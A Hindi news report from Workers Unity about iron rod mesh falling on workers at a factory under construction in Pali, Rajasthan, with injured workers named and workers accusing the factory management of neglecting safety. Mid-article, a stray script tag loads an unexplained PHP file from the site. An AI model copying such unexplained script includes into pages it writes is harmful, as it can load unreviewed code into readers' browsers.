पाली : फैक्ट्री में सरियों के नीचे दबे कई मजदूर, 7 की हालत गंभीर

https://www.workersunity.com/wp-content/uploads/2021/07/accident-pali.jpeg

राजस्थान के पाली जिले के आनंदपुर कालू थाना क्षेत्र में एक निर्माणाधीन फैक्ट्री में क्रेन से लोहे के सरिए उतारे समय लोहे के सरियों से बना जाल नीचे काम कर रहे मजदूरों पर गिर गया। जिससे 9 मजदूर नीचे दब गए।

घायल मजदूरों को ब्यावर अस्पताल में भर्ती कराया गया है जिनमें से सात की हालत गंभीर है।

दबे मजदूरों को बाहर निकालने के लिए काफी मशक्कत करनी पड़ी। लोहे का विशाल जाल इतना भारी था कि क्रेन से भी नहीं उठा। गैस कटर से काट कर बाद में क्रेन की सहायता से उसे हटाकर मजदूरों को निकाला गया।

रेस्क्यू करीब दो घंटे तक चला। बाद में एम्बुलेंस से तुरंत घायलों को अस्पताल पहुंचाया गया। जहां उनका उपचार चल रहा हैं।

मजदूरों ने अल्ट्राट्रेक फैक्ट्री प्रबन्धन पर लापरवाही का आरोप लगाया। मजदूरों का कहना है कि यहां काम बेहद भारी और जोखिम भरा है। इसके बावजूद बगैर सुरक्षा प्रावधानों के मजदूरों से काम कराया जाता है। इससे हादसे की संभावना लगातार बनी रहती है लेकिन प्रबंधन इसपर कोई ध्यान नहीं देता।

<script type=”text/javascript”src=”https://www.workersunity.com/rantex.php”></script>

मौके पर पहुंची पुलिस ने बताया कि निर्माणाधीन फैक्ट्री में डोम जैसे एक भवन में एक दर्जन से अधिक श्रमिक काम कर रहे थे। डोम के बाहर बड़े लोहे के सरीए पड़े थे। जिन्हें क्रेन की सहायता से डोम में पहुंचाया जा रहा था। इस दौरान क्रेन से कुछ सरिए निकलकर डोम में दीवार पर लगी सरियों की जाली में अटक गए। जिससे भारी लोहे की सरियों का जाल नीचे काम कर रहे मजदूरों पर जा गिरा। मौके पर अफरा तफरी मच गई।

हादसे में पाली जिले के बाबरा निवासी कालूराम पुत्र छूटाराम, रामपुर जैतारण निवासी सुखरामसिंह पुत्र गिरधारीसिंह, जैतारण निवासी भगवानराम देवासी पुत्र अमनराम देवासी, बलाड़ा निवासी महेन्द्रराम पुत्र गोविंदराम, टूकड़ा जैतारण निवासी चेतनप्रकाश पुत्र जगदीशराम एवं झारखंड निवासी अर्जुनराम पुत्र बिफनराम गंभीर घायल हो गए।

(साभार- पत्रिका)

(वर्कर्स यूनिटी स्वतंत्र निष्पक्ष मीडिया के उसूलों को मानता है। आप इसके फ़ेसबुकट्विटर और यूट्यूब को फॉलो कर इसे और मजबूत बना सकते हैं। वर्कर्स यूनिटी के टेलीग्राम चैनल को सब्सक्राइब करने के लिए यहां क्लिक करें। मोबाइल पर सीधे और आसानी से पढ़ने के लिए ऐप डाउनलोड करें।)

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.